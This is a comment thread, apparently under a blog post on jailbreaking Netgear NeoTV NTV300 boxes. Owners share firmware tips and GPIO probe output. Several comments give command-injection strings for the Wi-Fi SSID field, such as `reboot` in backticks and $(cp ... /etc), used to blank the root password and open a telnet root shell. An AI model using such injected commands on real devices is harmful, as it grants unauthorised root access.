
  48. Athena says:

    Hey Guys, I am really really new to this whole media box stuff. I have been running XBMC on my computer but want to get it onto my tv. My dad picked me up a NeoTV NTV300 so I guess im wondering if I jailbreak it can I run XBMC or can I get it to use this widi thing I have read about in the higher end NTV300 boxes from some hack. Thanks in advance!

  49. bender says:

    can you make a video because is don’t work for me please i need help thx

  50. google says:

    really cyberspace under these sort of cool, All of us perish simply too! That is abandoned in this interesting individual web is how really product my oh my!Considering that the seat, I think a huge answerability, simply you shouldn’t post, these

  51. randomguy says:

    Just thought id add to this, in Canada, the file path is ntv300b/ca/gm/fileinfo.xml etc (note the ca.)

    ddwrt on my router, dnsmasq to your webserver and the usual files and your gold

  52. Jig says:

    instructions posted by Rob at January 5, 2013 at 10:36 pm still work (even with the latest firmware!). I’m in.

    # uname -a
    Linux NTGR_NTV300 2.6.35 #1 PREEMPT Fri Feb 22 18:32:52 CST 2013 armv6l GNU/Linux

  53. Jig says:

    Anyone know how to remap the CUSTOM keys? (such as the ones for Netflix, Hulu, etc). I want to map one of the keys to another program that would be used more often than say VUDU for example. Maybe replace VUDU with Intel WiDi as a shortcut for example. I’ve tried snooping around, but couldn’t find anything. Looks like it uses LIRC for receiving remote control strokes, and there is a lirc_monitor that you can run to see the key sequences being received. But wasn’t able to track down where the actual mapping of the keys occurs. (typical lircd would just be in lircd.conf but looks like they’ve hard coded the key mapping into a binary somewhere).

  54. Bill Cullen says:

    Craig this is great. You did a great job. I have to ask, because I am new to this, can I add XBMC to the menu screen using this method. If so, how? Do I just add the Linux script from XBMCHUB.com or is there some other way? Thanks

  55. Kyle G says:

    I live in Canada and my NTV300 does not come with Hulu Plus. Is there a way I can get the american firmware on my device, or another way to add hulu plus to it?

    • Andy Burn says:

      You need to use an American proxy. Your IP gives you away as living in Canada. Try xroxy dot com. I use the paid service for other applications, and have done for 3 years now :)

  56. Attractive! This was a really delightful content. Thank you for giving this tips.

  57. Andy Burn says:

    Does anyone have this firmware still, that they wouldn’t mind sending me??
    Many Thanks,
    Andy
    download custrom image from here :

    http://rayman4ever.com/files/ntv/8653_linux_demo_dbg.bin

  58. Martin says:

    Hello i have a NTV max and i need to know if i can add new channels to my device, if its possible how i can do it? THX.

  59. gabo says:

    Great info, I had my NTV300(not S or SL version) with no dlna client feature available, I downgrade firmware to 1.0.76NA, and it worked like a charm, now I have dlna support. Mine was already at latest firmware version, so downgrade to that low version is not a problem. But still wondering why dlna feature is not included in latest firmware !

    • Urkeytay says:

      Just curious if you would be able to make up a step by step on how to downgrade this? I would really like to have DLNA support on this device. I am not a novice by any means, but when it comes to things like this, I may need a little step by step.

      Any help is much appreciated!

  60. Badri says:

    Hi, Do you know by any chance, what software is used in the remote for this device. I want to create a windows phone app. My remote is not working properly.

    Any info is appreciated.

    Thank you.

  61. Stephan says:

    I just tried this on the Neo NTV300SL with the latest firmware as of the date of this comment (1.1.50NA). Just using backticks did not work to inject system commands.
    You have to escape the backticks for it to work on my device.

    For example: to reboot my Neo I have to set the SSID to

    \`reboot\`

    I’ve worked through your script but creating the ‘enable’ file didn’t result in any change on the device. I’ll have a peek at the firmware files. Thanks for getting me started!

  62. GERMAN says:

    How can you all the same steps for the NEO TV NTV 200

    The “‘reboot”” does not work on this one

  63. Pingback: Rozpruwanie firmware-ów urządzeń sieciowych

  64. r1der1 says:

    Hi Craig, is it possible to install xbmc to NTV300?

  65. joe_sizlack says:

    That was an impressive display of badassery. My hat is off to you, sir.

  66. mhaya says:

    I was trying to see if i can download a browser on this device netgear NTV300. But was not able, is there an easy way out or I have to purchase the google box

  67. Kilroy says:

    Very good idea, and seeing as i have one of these i gave it a shot with minimal success. Here is what i did and how far i got.

    Using the quotes with “reboot” did not work, but $(reboot) however did work. I accesed the serial port and spawned the unfriendly shell. But i noticed a few things are missing, specifically the inetd binary. telnetd is present, but without the superserver it wont run. I overwrote the /etc/passwd using the ssid exploit to give root a blank password and typed “login” in the shell. Username: root, and it dropped me into a root shell. i copied utelnetd onto the device and was able to telnet in, but nothing persists across reboots. Seems everything i do in pretty much any directory gets reset on reboots. Any new files get erased, any file changes get reset, and i can’t seem to find any directory that persists. If someone could explain how i could possibly build a custom firmware or any other ideas i would be very grateful.

  68. ColtB45 says:

    I discovered that if you change gpio 63 to 1 it makes the getHWID utility think the B is a SL.

    getHWID # Check unit type, 0 = Basic, 1 = S, 2 = SL(MAX)
    0 # Basic unit
    gpio_prog 63 1 1 #[address] [0 = read / 1 = set] [If set, data]
    [APP]Gpio 63 input data is: 0 # gpio 63 is currently 0
    [APP]Gpio 63 select: 0 # IDK
    [APP]Gpio 63 output data is: 1 # gpio 63 was successfully set to 1
    getHWID
    2 # the unit is now detected as a SL (MAX)

    This still doesn’t work for fooling ntv300ui. It still detects that it’s not a MAX unit. It also doesn’t persist across reboots.

    Would someone who has access to a S or SL unit please run the following and post the results here? This will retrieve the state of GPIO (it will not alter it). FYI, reading the high numbered GPIOs caused my unit to reset although it didn’t harm anything.

    Commands to run. (Please copy and paste the results here)
    gpio_prog 0 0
    gpio_prog 1 0
    gpio_prog 2 0
    gpio_prog 3 0
    gpio_prog 4 0
    gpio_prog 5 0
    gpio_prog 6 0
    gpio_prog 7 0
    gpio_prog 8 0
    gpio_prog 9 0
    gpio_prog 10 0
    gpio_prog 11 0
    gpio_prog 12 0
    gpio_prog 13 0
    gpio_prog 14 0
    gpio_prog 15 0
    gpio_prog 16 0
    gpio_prog 17 0
    gpio_prog 18 0
    gpio_prog 19 0
    gpio_prog 20 0
    gpio_prog 21 0
    gpio_prog 22 0
    gpio_prog 23 0
    gpio_prog 24 0
    gpio_prog 25 0
    gpio_prog 26 0
    gpio_prog 27 0
    gpio_prog 28 0
    gpio_prog 29 0
    gpio_prog 30 0
    gpio_prog 31 0
    gpio_prog 32 0
    gpio_prog 33 0
    gpio_prog 34 0
    gpio_prog 35 0
    gpio_prog 36 0
    gpio_prog 37 0
    gpio_prog 38 0
    gpio_prog 39 0
    gpio_prog 40 0
    gpio_prog 41 0
    gpio_prog 42 0
    gpio_prog 43 0
    gpio_prog 44 0
    gpio_prog 45 0
    gpio_prog 46 0
    gpio_prog 47 0
    gpio_prog 48 0
    gpio_prog 49 0
    gpio_prog 50 0
    gpio_prog 51 0
    gpio_prog 52 0
    gpio_prog 53 0
    gpio_prog 54 0
    gpio_prog 55 0
    gpio_prog 56 0
    gpio_prog 57 0
    gpio_prog 58 0
    gpio_prog 59 0
    gpio_prog 60 0
    gpio_prog 61 0
    gpio_prog 62 0
    gpio_prog 63 0
    gpio_prog 64 0
    gpio_prog 65 0
    gpio_prog 66 0
    gpio_prog 67 0
    gpio_prog 68 0
    gpio_prog 69 0
    gpio_prog 70 0
    gpio_prog 71 0
    gpio_prog 72 0
    gpio_prog 73 0
    gpio_prog 74 0
    gpio_prog 75 0
    gpio_prog 76 0
    gpio_prog 77 0
    gpio_prog 78 0
    gpio_prog 79 0
    gpio_prog 80 0
    gpio_prog 81 0
    gpio_prog 82 0
    gpio_prog 83 0
    gpio_prog 84 0
    gpio_prog 85 0
    gpio_prog 86 0
    gpio_prog 87 0
    gpio_prog 88 0
    gpio_prog 89 0
    gpio_prog 90 0
    gpio_prog 91 0
    gpio_prog 92 0
    gpio_prog 93 0
    gpio_prog 94 0
    gpio_prog 95 0
    gpio_prog 96 0
    gpio_prog 97 0
    gpio_prog 98 0
    gpio_prog 99 0
    gpio_prog 100 0
    gpio_prog 101 0
    gpio_prog 102 0
    gpio_prog 103 0
    gpio_prog 104 0
    gpio_prog 105 0
    gpio_prog 106 0
    gpio_prog 107 0
    gpio_prog 108 0
    gpio_prog 109 0
    gpio_prog 110 0
    gpio_prog 111 0
    gpio_prog 112 0
    gpio_prog 113 0

    I ran this on my B unit and got the following:
    [APP]Gpio 0 input data is: 1
    [APP]Gpio 1 input data is: 1
    [APP]Gpio 2 input data is: 1
    [APP]Gpio 3 input data is: 1
    [APP]Gpio 4 input data is: 1
    [APP]Gpio 5 input data is: 0
    [APP]Gpio 6 input data is: 0
    [APP]Gpio 7 input data is: 1
    [APP]Gpio 8 input data is: 1
    [APP]Gpio 9 input data is: 1
    [APP]Gpio 10 input data is: 1
    [APP]Gpio 11 input data is: 0
    [APP]Gpio 12 input data is: 0
    [APP]Gpio 13 input data is: 0
    [APP]Gpio 14 input data is: 0
    [APP]Gpio 15 input data is: 1
    [APP]Gpio 16 input data is: 0
    [APP]Gpio 17 input data is: 0
    [APP]Gpio 18 input data is: 1
    [APP]Gpio 19 input data is: 1
    [APP]Gpio 20 input data is: 0
    [APP]Gpio 21 input data is: 0
    [APP]Gpio 22 input data is: 0
    [APP]Gpio 23 input data is: 0
    [APP]Gpio 24 input data is: 0
    [APP]Gpio 25 input data is: 0
    [APP]Gpio 26 input data is: 0
    [APP]Gpio 27 input data is: 0
    [APP]Gpio 28 input data is: 0
    [APP]Gpio 29 input data is: 1
    [APP]Gpio 30 input data is: 1
    [APP]Gpio 31 input data is: 0
    [APP]Gpio 32 input data is: 1
    [APP]Gpio 33 input data is: 1
    [APP]Gpio 34 input data is: 0
    [APP]Gpio 35 input data is: 0
    [APP]Gpio 36 input data is: 0
    [APP]Gpio 37 input data is: 1
    [APP]Gpio 38 input data is: 1
    [APP]Gpio 39 input data is: 1
    [APP]Gpio 40 input data is: 0
    [APP]Gpio 41 input data is: 0
    [APP]Gpio 42 input data is: 0
    [APP]Gpio 43 input data is: 0
    [APP]Gpio 44 input data is: 0
    [APP]Gpio 45 input data is: 0
    [APP]Gpio 46 input data is: 0
    [APP]Gpio 47 input data is: 0
    [APP]Gpio 48 input data is: 0
    [APP]Gpio 49 input data is: 0
    [APP]Gpio 50 input data is: 0
    [APP]Gpio 51 input data is: 0
    [APP]Gpio 52 input data is: 0
    [APP]Gpio 53 input data is: 1
    [APP]Gpio 54 input data is: 0
    [APP]Gpio 55 input data is: 0
    [APP]Gpio 56 input data is: 0
    [APP]Gpio 57 input data is: 1
    [APP]Gpio 58 input data is: 1
    [APP]Gpio 59 input data is: 0
    [APP]Gpio 60 input data is: 0
    [APP]Gpio 61 input data is: 1
    [APP]Gpio 62 input data is: 1
    [APP]Gpio 63 input data is: 0
    [APP]Gpio 64 input data is: 0
    [APP]Gpio 65 input data is: 1
    [APP]Gpio 66 input data is: 0
    [APP]Gpio 67 input data is: 0
    [APP]Gpio 68 input data is: 0
    [APP]Gpio 69 input data is: 1
    [APP]Gpio 70 input data is: 1
    [APP]Gpio 71 input data is: 1
    [APP]Gpio 72 input data is: 1
    [APP]Gpio 73 input data is: 1
    [APP]Gpio 74 input data is: 1
    [APP]Gpio 75 input data is: 0
    [APP]Gpio 76 input data is: 0
    [APP]Gpio 77 input data is: 1
    [APP]Gpio 78 input data is: 1
    [APP]Gpio 79 input data is: 1
    [APP]Gpio 80 input data is: 0
    [APP]Gpio 81 input data is: 0
    [APP]Gpio 82 input data is: 0
    [APP]Gpio 83 input data is: 0
    [APP]Gpio 84 input data is: 0
    [APP]Gpio 85 input data is: 0
    [APP]Gpio 86 input data is: 0
    [APP]Gpio 87 input data is: 1
    [APP]Gpio 88 input data is: 1
    [APP]Gpio 89 input data is: 0
    [APP]Gpio 90 input data is: 0
    [APP]Gpio 91 input data is: 0
    [APP]Gpio 92 input data is: 0
    [APP]Gpio 93 input data is: 0
    [APP]Gpio 94 input data is: 1
    [APP]Gpio 95 input data is: 1
    [APP]Gpio 96 input data is: 0
    [APP]Gpio 97 input data is: 0
    [APP]Gpio 98 input data is: 0
    [APP]Gpio 99 input data is: 0
    [APP]Gpio 100 input data is: 0
    [APP]Gpio 101 input data is: 0
    [APP]Gpio 102 input data is: 0
    [APP]Gpio 103 input data is: 0
    [APP]Gpio 104 input data is: 0
    [APP]Gpio 105 input data is: 0
    [APP]Gpio 106 input data is: 0
    [APP]Gpio 107 input data is: 0
    [APP]Gpio 108 input data is: 0
    [APP]Gpio 109 input data is: 0
    [APP]Gpio 110 input data is: 1
    [APP]Gpio 111 input data is: 1
    [APP]Gpio 112 input data is: 1
    [APP]Gpio 113 input data is: 1

    Thanks,
    ColtB45

  69. Kilroy says:

    ColtB45
    Here it is for a 300SL
    http://pastebin.com/MHXkLAj9

    Also i did find one directorty that persists across reboots for me.
    it is /cust_part_1
    havent had much time to play with this, but i was able to create files in that directory that persisted across reboots, so i can execute scripts from the essid via the $() exploit, but i still havent found a way to execute something on boot.
    have to run
    $(cp /cust_part_1/passwd /etc) #copys a passwd file with a blank root password
    $(sh) #spawns a non-interactive shell on the serial console
    then in minicom i type “login” (i found that if you leave the screen on the one you type the essid in, it was less likely to drop random characters)
    put root in as the user, and drops into shell. unfortunately typing login in blanks the screen on the tv so it cant be used once login is typed.
    or i can execute a copy of utelnetd i have saved in the cust_part_1 directory and log in remotely through telnet and the regular screen stays up. though plugging it in to an ethernet cord after executing $(sh) tends to make connecting easier.

  70. PB says:

    Is there any way to revive a bricked NeoTV 300 box? Mine got a new update & when it came back it is stuck on the neoTV logo

    • ColtB45 says:

      I don’t see any reason you couldn’t TFTP and flash a complete firmware image to it via U-Boot console. I could dump such an image if you want to try.

      • Tim says:

        Hell yeah. My 300SL bricked on an update last week. Now I just get the logo screen at startup. Any help would be hugely appreciated. Thanks for all your work so far!

  71. Mathew Kirschbaum says:

    So what would be the current method of jailbreaking the B version?

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>